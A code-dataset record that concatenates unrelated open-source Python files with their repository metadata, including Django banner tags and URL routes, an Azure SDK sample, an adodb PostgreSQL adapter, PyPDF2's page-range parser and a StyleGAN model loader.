'loggers': {
'snorky': {
'handlers': ['console'],
'level': 'DEBUG',
},
}
}
| [
"ntrrgc@gmail.com"
] | ntrrgc@gmail.com |
3bd8fc1258e19db21519b8c6f9f6d0805e198418 | 2b5a9c519df94942d58a519504336ab46287631a | /banners/templatetags/banners_tags.py | ec293521fa5d166eeec8b5b7cc35e1018bd1931c | [] | no_license | whitespy/djlime-banners | e106fd3d1276b16bce334dcfea6a746f9f9dbb2d | ffcd042069488d5127705931a759bfb828b318bd | refs/heads/master | 2021-05-19T21:27:17.524283 | 2012-07-23T13:29:31 | 2012-07-23T13:29:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,884 | py | from django.db.models import Q
from django.conf import settings
from django.template import Library
from banners.models import Banner
from banners import LOCATION_HEADER, LOCATION_CONTENT, LOCATION_SIDEBAR
register = Library()
CITY_CONTEXT_KEY = getattr(settings, 'CITY_CONTEXT_KEY', 'city')
BANNER_HEADER_TEMPLATE = \
getattr(settings, 'BANNER_HEADER_TEMPLATE', 'banners/includes/single_banner.html')
BANNER_CONTENT_TEMPLATE = \
getattr(settings, 'BANNER_CONTENT_TEMPLATE', 'banners/includes/single_banner.html')
BANNER_SIDEBAR_TEMPLATE = \
getattr(settings, 'BANNER_SIDEBAR_TEMPLATE', 'banners/includes/banners_block.html')
BANNER_COUNT_PER_SIDEBAR = getattr(settings, 'BANNER_COUNT_PER_SIDEBAR', False)
@register.inclusion_tag(BANNER_HEADER_TEMPLATE, takes_context=True)
def include_header_banner(context):
city = context.get(CITY_CONTEXT_KEY, None)
try:
banner = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_HEADER
).order_by('?')[0]
except IndexError:
banner = None
return {'banner': banner}
@register.inclusion_tag(BANNER_HEADER_TEMPLATE, takes_context=True)
def include_content_banner(context):
city = context.get(CITY_CONTEXT_KEY, None)
try:
banner = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_CONTENT
).order_by('?')[0]
except IndexError:
banner = None
return {'banner': banner}
@register.inclusion_tag(BANNER_SIDEBAR_TEMPLATE, takes_context=True)
def include_sidebar_banners(context):
city = context.get(CITY_CONTEXT_KEY, None)
banners = Banner.objects.filter(Q(city__exact=city) | Q(city__exact=None),
location=LOCATION_SIDEBAR
)
if BANNER_COUNT_PER_SIDEBAR:
banners = banners[:int(BANNER_COUNT_PER_SIDEBAR)]
return {'banners': banners}
| [
"whitespysoftware@yandex.ru"
] | whitespysoftware@yandex.ru |
cab7f3324eb0b7c8dba67533ab697b9dc6b85c1c | fcb27ecaf34f2fcd060ed378231efdb9620c5812 | /实例/2.py | 68ebb072a654e9a6d42b65afb59daeabd2ffff7e | [] | no_license | chainet/jerry | 3d8051e2451581ea85dd45a26f4ae39217d5a1c6 | 0a8c55d415fe8a6275b9615c0b102abc7cfc2162 | refs/heads/master | 2021-04-28T02:09:27.847423 | 2019-04-21T12:09:46 | 2019-04-21T12:09:46 | 122,295,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #实例2
#http://www.runoob.com/python/python-exercise-example2.html
def get_reward(I):
rewards = 0
if I <= 10:
rewards = I * 0.1
elif (I > 10) and (I <= 20):
rewards = (I - 10) * 0.075 + get_reward(10)
elif (I > 20) and (I <= 40):
rewards = (I - 20) * 0.05 + get_reward(20)
elif (I > 40) and (I <= 60):
rewards = (I - 40) * 0.03 + get_reward(40)
elif (I > 60) and (I <= 100):
rewards = (I - 60) * 0.015 + get_reward(60)
else:
rewards = get_reward(100) + (I - 100) * 0.01
return rewards
print("净利润:")
i = int(input())
if __name__ == '__main__':
print("发放的奖金为:", get_reward(i / 10000) * 10000) | [
"chainet@gmail.com"
] | chainet@gmail.com |
b8c9672e42c3bf90c709b694832601d20977efac | 14f455693213cae4506a01b7d0591e542c38de79 | /apps/profile/urls.py | ae3b903bd2e0bbdeddb2002969555017bac9927d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Cvalladares/Newsblur_Instrumented | f0b14d063759973330f202108a7eed3a29bcc033 | 4d6ee6aa9713879b1e2550ea5f2dbd819c73af12 | refs/heads/master | 2022-12-29T15:19:29.726455 | 2019-09-03T17:09:04 | 2019-09-03T17:09:04 | 206,130,022 | 0 | 0 | MIT | 2022-12-10T06:00:26 | 2019-09-03T17:07:04 | Python | UTF-8 | Python | false | false | 2,248 | py | from django.conf.urls import *
from apps.profile import views
urlpatterns = patterns('',
url(r'^get_preferences?/?', views.get_preference),
url(r'^set_preference/?', views.set_preference),
url(r'^set_account_settings/?', views.set_account_settings),
url(r'^get_view_setting/?', views.get_view_setting),
url(r'^set_view_setting/?', views.set_view_setting),
url(r'^clear_view_setting/?', views.clear_view_setting),
url(r'^set_collapsed_folders/?', views.set_collapsed_folders),
url(r'^paypal_form/?', views.paypal_form),
url(r'^paypal_return/?', views.paypal_return, name='paypal-return'),
url(r'^is_premium/?', views.profile_is_premium, name='profile-is-premium'),
url(r'^paypal_ipn/?', include('paypal.standard.ipn.urls'), name='paypal-ipn'),
url(r'^paypal_webhooks/?', include('paypal.standard.ipn.urls'), name='paypal-webhooks'),
url(r'^stripe_form/?', views.stripe_form, name='stripe-form'),
url(r'^activities/?', views.load_activities, name='profile-activities'),
url(r'^payment_history/?', views.payment_history, name='profile-payment-history'),
url(r'^cancel_premium/?', views.cancel_premium, name='profile-cancel-premium'),
url(r'^refund_premium/?', views.refund_premium, name='profile-refund-premium'),
url(r'^never_expire_premium/?', views.never_expire_premium, name='profile-never-expire-premium'),
url(r'^upgrade_premium/?', views.upgrade_premium, name='profile-upgrade-premium'),
url(r'^save_ios_receipt/?', views.save_ios_receipt, name='save-ios-receipt'),
url(r'^update_payment_history/?', views.update_payment_history, name='profile-update-payment-history'),
url(r'^delete_account/?', views.delete_account, name='profile-delete-account'),
url(r'^forgot_password_return/?', views.forgot_password_return, name='profile-forgot-password-return'),
url(r'^forgot_password/?', views.forgot_password, name='profile-forgot-password'),
url(r'^delete_starred_stories/?', views.delete_starred_stories, name='profile-delete-starred-stories'),
url(r'^delete_all_sites/?', views.delete_all_sites, name='profile-delete-all-sites'),
url(r'^email_optout/?', views.email_optout, name='profile-email-optout'),
)
| [
"Cvalladares4837@gmail.com"
] | Cvalladares4837@gmail.com |
a150f25eb027d1b21cf74cf109a18e85acada783 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/apimanagement/azure-mgmt-apimanagement/generated_samples/api_management_user_confirmation_password_send.py | 793650579dac2e949735e69fe128bc5958cef7ad | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,638 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.apimanagement import ApiManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-apimanagement
# USAGE
python api_management_user_confirmation_password_send.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = ApiManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.user_confirmation_password.send(
resource_group_name="rg1",
service_name="apimService1",
user_id="57127d485157a511ace86ae7",
)
print(response)
# x-ms-original-file: specification/apimanagement/resource-manager/Microsoft.ApiManagement/stable/2022-08-01/examples/ApiManagementUserConfirmationPasswordSend.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
101e6cd4892fefaf5467a3acd914319a647fb08d | 59db55b4a8aa9740dd488e09685c0b3aea1a280c | /adodb-220/build/lib.linux-x86_64-2.7/adodb/adodb_postgres.py | 4b1ee64b25d8c6e7b1ce560689e71c385a25f2aa | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Iskuri/Banner-Grabber | 08c7579186ea40dd898529b0c2c33a3316d65a1d | 9e21dab02c41797cdf50cc69e8a28b95a906b3de | refs/heads/master | 2021-01-22T19:32:20.138848 | 2013-09-29T07:53:34 | 2013-09-29T07:53:34 | 12,995,136 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,349 | py | ########################################################################
# Vers 2.10 16 July 2008, (c)2004-2008 John Lim (jlim#natsoft.com) All Rights Reserved
# Released under a BSD-style license. See LICENSE.txt.
# Download: http://adodb.sourceforge.net/#pydownload
########################################################################
import adodb
import psycopg
try:
True, False
except NameError:
# Maintain compatibility with Python 2.2
True, False = 1, 0
# Thread Safety= 2 connections
# Param Style = pyformat "%(name)s"
class adodb_postgres(adodb.ADOConnection):
databaseType = 'postgres'
dataProvider = 'postgres'
sysDate = "CURRENT_DATE"
sysTimeStamp = "CURRENT_TIMESTAMP"
metaColSQL = """SELECT a.attname,t.typname,a.attlen,a.atttypmod,a.attnotnull,a.atthasdef,a.attnum
FROM pg_class c, pg_attribute a,pg_type t
WHERE relkind = 'r' AND (c.relname='%s' or c.relname = lower('%s')) and a.attname not like '....%%'
AND a.attnum > 0 AND a.atttypid = t.oid AND a.attrelid = c.oid ORDER BY a.attnum"""
def __init__(self):
pass
def Module(self):
return psycopg
#host=host1 user=user1 password=secret port=4341
def _connect(self,host=None,user=None,password=None,database=None):
if user == None and password == None and database == None:
dsn = host
else:
dsn = 'host='+self.addq(host)
if (user != None): dsn += ' user='+self.addq(user)
if (password != None): dsn += ' password='+self.addq(password)
if (database != None): dsn += ' dbname='+self.addq(database)
self._conn = psycopg.connect(dsn)
self._conn.autocommit(1)
def _newcursor(self,rs):
return cursor_postgres(rs,self)
def SelectLimit(self,sql,limit,offset=-1,params=None):
if (offset >= 0): offset = " OFFSET "+str(offset)
else: offset = ""
return self.Execute(sql+" LIMIT "+str(limit)+offset,params)
def BeginTrans(self):
if self._autocommit:
self._autocommit = False
self._conn.autocommit(0)
def RollbackTrans(self):
self._conn.rollback()
self._autocommit = True
self._conn.autocommit(1)
def CommitTrans(self):
self._conn.commit()
self._autocommit = True
self._conn.autocommit(1)
def _blobencode(self,blob):
blob = str(blob)
#92=backslash, 0=null, 39=single-quote
return blob.replace(chr(92),r'\\134').replace(chr(0),r'\\000').replace(chr(39),r'\\047')
def UpdateBlob(self,table,field,blob,where,blobtype='BLOB'):
if (blobtype == 'BLOB'):
self.Execute("update %s set %s='%s' WHERE %s" % (table,field,self._blobencode(blob),where))
else:
self.Execute("update %s set %s='%s' WHERE %s" % (table,field,self.addq(blob),where))
def MetaColumns(self, table):
#print self.metaColSQL
sql = self.metaColSQL % (table,table)
return self.GetAll(sql)
class cursor_postgres(adodb.ADOCursor):
def __init__(self,rs,conn):
adodb.ADOCursor.__init__(self,rs,conn)
if __name__ == '__main__':
db = adodb_postgres()
db.Connect('localhost','tester','test','test')
adodb.Test(db)
#adodb.Test_Blob(db) | [
"christopher@desktop.laptop"
] | christopher@desktop.laptop |
3d89915c498c68bd9d17c84c6b2ddf8a5a3a0dc1 | 4dcb84ae7e60a9f82e6f9bdf39cd6db6a76cacc5 | /myMatchingApp/manage.py | 4e36140caf08c21da65fc9b595e174ce7e76d443 | [] | no_license | lmarianarp19/myMatchingApp | b0f6ce94e88be072d1e656b6768ac36c0d7db77a | aa338d2276505f90c5b2b762d93932205090fed7 | refs/heads/master | 2021-05-15T05:58:29.474206 | 2018-01-24T21:36:08 | 2018-01-24T21:36:08 | 116,075,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myMatchingApp.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"lmarianarp@gmail.com"
] | lmarianarp@gmail.com |
6b44bf6e1fdf400b4c6bb129494dc274380387f5 | 8ec40c0c569550a14ae173c2c074f7dcc6bcd8d9 | /help/source/conf.py | 1265d760bd431fec72eb033b7603b296cf08212a | [] | no_license | klakar/layerList | 638f3fc2778ecd36ad64e6dfa17cf4c978706468 | fb242d375a04eb7ae8c8baefbfe5ec3b69f56311 | refs/heads/master | 2021-01-19T01:52:09.769511 | 2016-07-02T20:11:01 | 2016-07-02T20:11:01 | 19,351,050 | 0 | 0 | null | 2015-07-08T16:15:32 | 2014-05-01T16:53:34 | Python | UTF-8 | Python | false | false | 7,052 | py | # -*- coding: utf-8 -*-
#
# layerlist documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 12 17:11:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo', 'sphinx.ext.pngmath', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'layerlist'
copyright = u'2013, Klas Karlsson'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'templateclassdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'layerlist.tex', u'layerlist Documentation',
u'Klas Karlsson', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'templateclass', u'layerlist Documentation',
[u'Klas Karlsson'], 1)
]
| [
"klaskarlsson@hotmail.com"
] | klaskarlsson@hotmail.com |
bb9907066005e577a1998be045ba95d25cf0401b | 48bb4a0dbb361a67b88b7c7532deee24d70aa56a | /codekata/greatese.py | 5bf5eea99317b8d7235f806cd8e0e600b1945704 | [] | no_license | PRAMILARASI/GUVI | 66080a80400888263d511138cb6ecd37540507c7 | 6a30a1d0a3f4a777db895f0b3adc8b0ac90fd25b | refs/heads/master | 2022-01-28T08:54:07.719735 | 2019-06-24T15:57:05 | 2019-06-24T15:57:05 | 191,355,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | x=int(input(""))
y=int(input(""))
z=int(input(""))
if(x>y>z):
largest=x
print(largest)
elif(y>z):
largest=y
print (largest)
else:
largest=z
print(largest)
| [
"noreply@github.com"
] | noreply@github.com |
f08781c8f26e8affed183ad0d876cd3d32f6e4cf | cabe1d490d39f899f08f247288d48c09a556205a | /cloudpulse/scenario/plugins/all_tests/all_tests.py | c9249978b4459333b9629bd3bc731327508d647b | [
"Apache-2.0"
] | permissive | tsjondin/cloudpulse | 69053e795e371ec87e7da2e3ded0c123334ad11e | 45b7cbe59c8a3c8a5f50eb051dd151f25fbee4e7 | refs/heads/master | 2021-06-26T02:20:06.090310 | 2017-06-22T04:57:56 | 2017-06-22T04:58:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,159 | py | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudpulse.common.plugin import discover
from cloudpulse.scenario import base
from oslo_config import cfg
cfg.CONF.import_opt('auth_uri', 'keystonemiddleware.auth_token',
group='keystone_authtoken')
TESTS_OPTS = [
cfg.IntOpt('all_tests',
default=0,
help='Run all tests')
]
CONF = cfg.CONF
periodic_test_group = cfg.OptGroup(name='periodic_tests',
title='Periodic tests to be run')
CONF.register_group(periodic_test_group)
CONF.register_opts(TESTS_OPTS, periodic_test_group)
class all_scenario(base.Scenario):
@base.scenario(admin_only=False, operator=False)
def all_tests(self):
enabled_scenarios = cfg.CONF.scenario.enabled_scenarios
all_cases = []
result = 200
resultmsg = ''
discover.import_modules_from_package("cloudpulse.scenario.plugins")
for scenario_group in discover.itersubclasses(base.Scenario):
if scenario_group.__name__ in enabled_scenarios:
all_cases += [getattr(scenario_group(), method)
for method in dir(scenario_group)
if method.startswith("all")]
for func in all_cases:
try:
funres = func()
except Exception as e:
funres = [404, str(e)]
if funres[0] != 200:
resultmsg += ("%s\n\n" % (funres[1]))
result = 404
if not resultmsg:
resultmsg = "All Tests passed"
return (result, resultmsg)
| [
"anand1712@gmail.com"
] | anand1712@gmail.com |
1ebddb7866c7815a2e3c97c2bf8ff563a8a599a8 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/PyPDF2/pagerange.py | c19d1790b7d1f2f79c4ccb755a80439f4a49a821 | [] | no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,650 | py | #!/usr/bin/env python
"""
Representation and utils for ranges of PDF file pages.
Copyright (c) 2014, Steve Witham <switham_github@mac-guyver.com>.
All rights reserved. This software is available under a BSD license;
see https://github.com/mstamy2/PyPDF2/LICENSE
"""
import re
from .utils import Str
_INT_RE = r"(0|-?[1-9]\d*)" # A decimal int, don't allow "-0".
PAGE_RANGE_RE = "^({int}|({int}?(:{int}?(:{int}?)?)))$".format(int=_INT_RE)
# groups: 12 34 5 6 7 8
class ParseError(Exception):
pass
PAGE_RANGE_HELP = """Remember, page indices start with zero.
Page range expression examples:
: all pages. -1 last page.
22 just the 23rd page. :-1 all but the last page.
0:3 the first three pages. -2 second-to-last page.
:3 the first three pages. -2: last two pages.
5: from the sixth page onward. -3:-1 third & second to last.
The third, "stride" or "step" number is also recognized.
::2 0 2 4 ... to the end. 3:0:-1 3 2 1 but not 0.
1:10:2 1 3 5 7 9 2::-1 2 1 0.
::-1 all pages in reverse order.
"""
class PageRange(object):
"""
A slice-like representation of a range of page indices,
i.e. page numbers, only starting at zero.
The syntax is like what you would put between brackets [ ].
The slice is one of the few Python types that can't be subclassed,
but this class converts to and from slices, and allows similar use.
o PageRange(str) parses a string representing a page range.
o PageRange(slice) directly "imports" a slice.
o to_slice() gives the equivalent slice.
o str() and repr() allow printing.
o indices(n) is like slice.indices(n).
"""
def __init__(self, arg):
"""
Initialize with either a slice -- giving the equivalent page range,
or a PageRange object -- making a copy,
or a string like
"int", "[int]:[int]" or "[int]:[int]:[int]",
where the brackets indicate optional ints.
{page_range_help}
Note the difference between this notation and arguments to slice():
slice(3) means the first three pages;
PageRange("3") means the range of only the fourth page.
However PageRange(slice(3)) means the first three pages.
"""
if isinstance(arg, slice):
self._slice = arg
return
if isinstance(arg, PageRange):
self._slice = arg.to_slice()
return
m = isinstance(arg, Str) and re.match(PAGE_RANGE_RE, arg)
if not m:
raise ParseError(arg)
elif m.group(2):
# Special case: just an int means a range of one page.
start = int(m.group(2))
stop = start + 1 if start != -1 else None
self._slice = slice(start, stop)
else:
self._slice = slice(*[int(g) if g else None
for g in m.group(4, 6, 8)])
__init__.__doc__ = __init__.__doc__.format(page_range_help=PAGE_RANGE_HELP)
@staticmethod
def valid(input):
""" True if input is a valid initializer for a PageRange. """
return isinstance(input, slice) or \
isinstance(input, PageRange) or \
(isinstance(input, Str)
and bool(re.match(PAGE_RANGE_RE, input)))
def to_slice(self):
""" Return the slice equivalent of this page range. """
return self._slice
def __str__(self):
""" A string like "1:2:3". """
s = self._slice
if s.step == None:
if s.start != None and s.stop == s.start + 1:
return str(s.start)
indices = s.start, s.stop
else:
indices = s.start, s.stop, s.step
return ':'.join("" if i == None else str(i) for i in indices)
def __repr__(self):
""" A string like "PageRange('1:2:3')". """
return "PageRange(" + repr(str(self)) + ")"
def indices(self, n):
"""
n is the length of the list of pages to choose from.
Returns arguments for range(). See help(slice.indices).
"""
return self._slice.indices(n)
PAGE_RANGE_ALL = PageRange(":") # The range of all pages.
def parse_filename_page_ranges(args):
"""
Given a list of filenames and page ranges, return a list of
(filename, page_range) pairs.
First arg must be a filename; other ags are filenames, page-range
expressions, slice objects, or PageRange objects.
A filename not followed by a page range indicates all pages of the file.
"""
pairs = []
pdf_filename = None
did_page_range = False
for arg in args + [None]:
if PageRange.valid(arg):
if not pdf_filename:
raise ValueError("The first argument must be a filename, " \
"not a page range.")
pairs.append( (pdf_filename, PageRange(arg)) )
did_page_range = True
else:
# New filename or end of list--do all of the previous file?
if pdf_filename and not did_page_range:
pairs.append( (pdf_filename, PAGE_RANGE_ALL) )
pdf_filename = arg
did_page_range = False
return pairs
| [
"noreply@github.com"
] | noreply@github.com |
1649d917f53e31b226522ddb6e6e0bd1dc1ceae1 | 8552e78086fc563d4fa8bc64ec1e81fafe243b74 | /modules/database/pullUser.py | d95acea0c80442a170d421d8a52b6fa0e0c05610 | [] | no_license | ms7m/guardia | 5ea9b416e0d3728ad25a41533e43396e28fbc8ec | 710fe69e60a079d0da3ee73014cb5ae1315d0732 | refs/heads/master | 2022-12-10T21:37:23.103738 | 2020-01-19T04:28:14 | 2020-01-19T04:28:14 | 229,809,903 | 3 | 0 | null | 2022-12-08T03:20:52 | 2019-12-23T19:17:41 | Python | UTF-8 | Python | false | false | 3,296 | py | from modules.database.createDatabase import MongoDB
from modules.authentication import SettingsConfiguration as Configuration
from datetime import datetime
from loguru import logger
from bson.objectid import ObjectId
class PullUser:
def _loadPrimaryDatabase(self):
try:
self.primary_database = self._mongoDb.resulting['userData']
return True
except Exception as error:
logger.debug(f'Dumped Attrs: {dir(self._mongoDb)}')
try:
logger.debug(f"Resulting: {self._mongoDb.resulting}")
except Exception as dumped_error:
logger.error('Complete Failure. Both Exceptions occured.')
logger.error(f'Error on PrimaryGet: {error}')
logger.error(f"Error on Dump: {dumped_error}")
raise Exception('Unable to load primary Database.')
def __init__(self, mongoDbObject, redisConnection):
self.redisConnection = redisConnection
if isinstance(mongoDbObject, MongoDB) == True:
self._mongoDb = mongoDbObject
attempt_loadPrimaries = self._loadPrimaryDatabase()
if attempt_loadPrimaries == True:
self._primaryVerifiation = True
else:
raise Exception('Unable to load primary database.')
else:
raise ValueError(f'Improper Object. Expected MongoDB. {mongoDbObject}')
logger.info('Initalized Pull User.')
def _redisPullUser(self, redis_cache_id):
try:
redis_query, redis_result = self.redisConnection._checkKey(
redis_cache_id
)
if redis_query == True:
return True, redis_result
return False, None
except Exception as error:
logger.info(f"unable to get redis result due to {error}")
return False, None
def _mongoPullUser(self, object_id):
# Fallback.
mongo_result = self._mongoDb.find_one(
{
"_id": ObjectId(object_id)
}
)
if mongo_result:
return True, mongo_result
else:
logger.critical("Unable to find mongo result even with provided ID!")
logger.debug("Error ID: {object_id}")
return False, None
def pull_user_from_service(self, verifyObject, providedServiceId):
# Psuedo Link to verifyUser.verify_user with Configuration
provided_configuration = Configuration()
# Configure
provided_configuration.provided_id_bool = False
provided_configuration.serviceUniqueId = providedServiceId
return verifyObject.verify_user(provided_configuration)
def pull_user(self, redis_cache_id):
redis_query, redis_result = self._redisPullUser(
redis_cache_id
)
if redis_query == True:
return redis_result
else:
mongo_query, mongo_result = self._mongoPullUser(
redis_cache_id
)
if mongo_query == True:
return mongo_result
else:
logger.critical(f"Completely Unable to Find Specified ID! {redis_cache_id}")
return None
| [
"ms7mohamed@gmail.com"
] | ms7mohamed@gmail.com |
b120bf63954049ee7c975ea42b994bd4403d4544 | 3fb57bf3bd86cc75985faaa2c83318273e723d81 | /project/model.py | 7f5debdd8636663ed8ac446cc1397a5836b77e41 | [
"MIT"
] | permissive | delldu/Idinvert | ea0fd376a0b92636232bd0ba5cafdd8d129367dc | 9977118e37ac18d573497eb7cdb7be66fbc50a58 | refs/heads/master | 2023-07-02T12:54:40.178912 | 2021-08-11T12:55:53 | 2021-08-11T12:55:53 | 393,851,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | """Create model.""" # coding=utf-8
#
# /************************************************************************************
# ***
# *** Copyright Dell 2021, All Rights Reserved.
# ***
# *** File Author: Dell, 2021年 08月 10日 星期二 15:49:52 CST
# ***
# ************************************************************************************/
#
import os
import pdb # For debug
import torch
from stylegan2_encoder import StyleGANEncoder
from stylegan2_decoder import StyleGANDecoder
from stylegan2_refiner import VGG16, StyleGANRefiner
def model_load(model, path, prefix=""):
"""Load model."""
if not os.path.exists(path):
print("Model '{}' does not exist.".format(path))
return
state_dict = torch.load(path, map_location=lambda storage, loc: storage)
target_state_dict = model.state_dict()
for n, p in state_dict.items():
if len(prefix) > 0 and not n.startswith(prefix):
continue
n = n.replace(prefix, "")
if n in target_state_dict.keys():
target_state_dict[n].copy_(p)
else:
raise KeyError(n)
def model_save(model, path):
"""Save model."""
torch.save(model.state_dict(), path)
def get_encoder(checkpoint):
"""Create model."""
model = StyleGANEncoder()
model_load(model, checkpoint, prefix="")
return model
def get_decoder(checkpoint):
"""Create model."""
model = StyleGANDecoder()
model_load(model, checkpoint, prefix="synthesis.")
return model
